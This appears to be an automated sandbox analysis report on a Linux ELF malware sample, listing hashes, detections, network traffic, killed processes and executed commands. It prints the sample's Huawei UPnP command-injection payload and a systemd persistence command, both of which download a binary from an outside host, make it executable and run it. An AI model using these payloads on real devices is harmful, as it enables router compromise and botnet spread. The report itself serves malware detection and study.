Linux Analysis Report
5.elf

Overview

General Information

Sample name: 5.elf
Analysis ID: 1588850
MD5: 40d57a51ffba8151bf851940d0ad367e
SHA1: dd2bbf98840d5cfe68e6cdc660c6c25e4de6dbc9
SHA256: c14f6f5a9f774456aef2319034d9e6b57975164e2bdbf9a4bf178737a3e725c3
Tags: elfuser-abuse_ch
Infos:

Detection

Score: 56
Range: 0 - 100
Whitelisted: false

Signatures

Multi AV Scanner detection for submitted file
Sample deletes itself
Sample tries to kill multiple processes (SIGKILL)
Detected non-DNS traffic on DNS port
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "rm" command used to delete files or directories
Executes the "sleep" command used to delay execution and potentially evade sandboxes
Executes the "systemctl" command used for controlling the systemd system and service manager
Executes the "wget" command typically used for HTTP/S downloading
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Sets full permissions to files and/or directories
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk

Classification

AV Detection

barindex
Source: 5.elf ReversingLabs: Detection: 39%
Source: global traffic TCP traffic: 192.168.2.13:56441 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.13:34549 -> 1.1.1.1:53
Source: /bin/bash (PID: 5465) Wget executable: /usr/bin/wget -> wget http://103.136.41.100/5 -O /tmp/5 Jump to behavior
Source: /tmp/5.elf (PID: 5423) Socket: 127.0.0.1:23476 Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 103.136.41.100Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: daisy.ubuntu.com
Source: 5.42.dr String found in binary or memory: http://%d.%d.%d.%d/%s
Source: 5.elf, 5.42.dr String found in binary or memory: http://%d.%d.%d.%d/2;
Source: 5.elf, 5423.1.00007fa550036000.00007fa55003a000.rw-.sdmp, bash, 5468.1.00007f39c4036000.00007f39c403a000.rw-.sdmp, 5, 5468.1.00007f39c4036000.00007f39c403a000.rw-.sdmp String found in binary or memory: http://1/wget.sh
Source: hello.service.12.dr String found in binary or memory: http://103.136.41.100/5
Source: 5.elf, 5423.1.00007fa550036000.00007fa55003a000.rw-.sdmp, bash, 5468.1.00007f39c4036000.00007f39c403a000.rw-.sdmp, 5, 5468.1.00007f39c4036000.00007f39c403a000.rw-.sdmp String found in binary or memory: http://9/curl.sh
Source: 5.42.dr String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 5.42.dr String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

System Summary

barindex
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3104, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3161, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3162, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3163, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3164, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3165, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3170, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3182, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3212, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 5427, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 5428, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 5429, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 5430, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 5431, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 5432, result: successful Jump to behavior
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/*; /bin/busybox wget -g %d.%d.%d.%d -l /tmp/.vs -r /h; /bin/busybox chmod 777 /tmp/.vs; /tmp/.vs; sh /tmp/.vs)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: %s%d%s<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/*; /bin/busybox wget -g %d.%d.%d.%d -l /tmp/.vs -r /h; /bin/busybox chmod 777 /tmp/.vs; /tmp/.vs; sh /tmp/.vs)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: ELF static info symbol of initial sample .symtab present: no
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3104, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3161, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3162, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3163, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3164, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3165, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3170, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3182, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3212, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 5427, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 5428, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 5429, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 5430, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 5431, result: successful Jump to behavior
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 5432, result: successful Jump to behavior
Source: classification engine Classification label: mal56.spre.evad.linELF@0/3@2/0
Source: /tmp/5.elf (PID: 5423) File opened: /proc/5262/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/5262/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/5262/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/5262/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/5262/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3122/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3122/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3122/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3122/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3122/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3117/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3117/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3117/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3117/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3117/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3114/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3114/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3114/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3114/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3114/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/914/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/914/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/914/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/914/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/914/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/917/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/917/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/917/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/917/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/917/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3134/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3134/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3134/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3134/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3134/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3375/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3375/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3375/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3375/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3375/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3132/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3132/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3132/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3132/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3132/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3095/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3095/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3095/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3095/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3095/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1866/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1866/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1866/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1866/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1866/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1745/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1745/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1745/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1745/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1745/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1588/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1588/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1588/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1588/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1588/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/884/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/884/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/884/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/884/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/884/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1982/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1982/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1982/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1982/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1982/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/765/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/765/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/765/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/765/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/765/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3246/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3246/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3246/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3246/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3246/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/800/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/800/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/800/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/800/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/800/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/767/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/767/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/767/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/767/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/767/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/5423/status Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1906/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1906/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1906/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1906/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1906/cmdline Jump to behavior
Source: /tmp/5.elf (PID: 5436) Shell command executed: sh -c "systemctl daemon-reload > /dev/null 2>&1" Jump to behavior
Source: /tmp/5.elf (PID: 5442) Shell command executed: sh -c "systemctl start hello.service > /dev/null 2>&1" Jump to behavior
Source: /usr/lib/systemd/systemd (PID: 5445) Shell command executed: /bin/bash -c "sleep 10; rm -rf /tmp/5; wget http://103.136.41.100/5 -O /tmp/5; chmod 777 /tmp/5; /tmp/5 .p1 > /dev/null 2>&1;" Jump to behavior
Source: /bin/bash (PID: 5467) Chmod executable: /usr/bin/chmod -> chmod 777 /tmp/5 Jump to behavior
Source: /bin/bash (PID: 5464) Rm executable: /usr/bin/rm -> rm -rf /tmp/5 Jump to behavior
Source: /bin/sh (PID: 5438) Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload Jump to behavior
Source: /bin/sh (PID: 5444) Systemctl executable: /usr/bin/systemctl -> systemctl start hello.service Jump to behavior
Source: /bin/bash (PID: 5465) Wget executable: /usr/bin/wget -> wget http://103.136.41.100/5 -O /tmp/5 Jump to behavior
Source: /usr/bin/chmod (PID: 5467) File: /tmp/5 (bits: - usr: rwx grp: rwx all: rwx) Jump to behavior
Source: /bin/bash (PID: 5467) Chmod executable with 777: /usr/bin/chmod -> chmod 777 /tmp/5 Jump to behavior
Source: /usr/bin/wget (PID: 5465) File written: /tmp/5 Jump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: /usr/bin/rm (PID: 5464) File: /tmp/5 Jump to behavior
Source: /bin/bash (PID: 5453) Sleep executable: /usr/bin/sleep -> sleep 10 Jump to behavior
Source: /tmp/5.elf (PID: 5423) Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5427) Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5428) Queries kernel information via 'uname': Jump to behavior
Source: /bin/bash (PID: 5445) Queries kernel information via 'uname': Jump to behavior
Source: /tmp/5 (PID: 5468) Queries kernel information via 'uname': Jump to behavior
Source: 5.elf, 5423.1.00005579a3cef000.00005579a3e40000.rw-.sdmp Binary or memory string: yU!/etc/qemu-binfmt/arm
Source: bash, 5468.1.000055d399102000.000055d399253000.rw-.sdmp, 5, 5468.1.000055d399102000.000055d399253000.rw-.sdmp Binary or memory string: U!/etc/qemu-binfmt/arm
Source: 5.elf, 5423.1.00007ffc8cdb6000.00007ffc8cdd7000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/5.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/5.elf
Source: 5.elf, 5423.1.00005579a3cef000.00005579a3e40000.rw-.sdmp, bash, 5468.1.000055d399102000.000055d399253000.rw-.sdmp, 5, 5468.1.000055d399102000.000055d399253000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: 5.elf, 5423.1.00007ffc8cdb6000.00007ffc8cdd7000.rw-.sdmp, bash, 5468.1.00007ffee283f000.00007ffee2860000.rw-.sdmp, 5, 5468.1.00007ffee283f000.00007ffee2860000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
Source: bash, 5468.1.00007ffee283f000.00007ffee2860000.rw-.sdmp, 5, 5468.1.00007ffee283f000.00007ffee2860000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/5.p1PWD=/LANG=en_US.UTF-8INVOCATION_ID=ea6e6a85720a446fbd5c3f439d3be8feSHLVL=1JOURNAL_STREAM=9:62552PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin_=/tmp/5/tmp/5
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs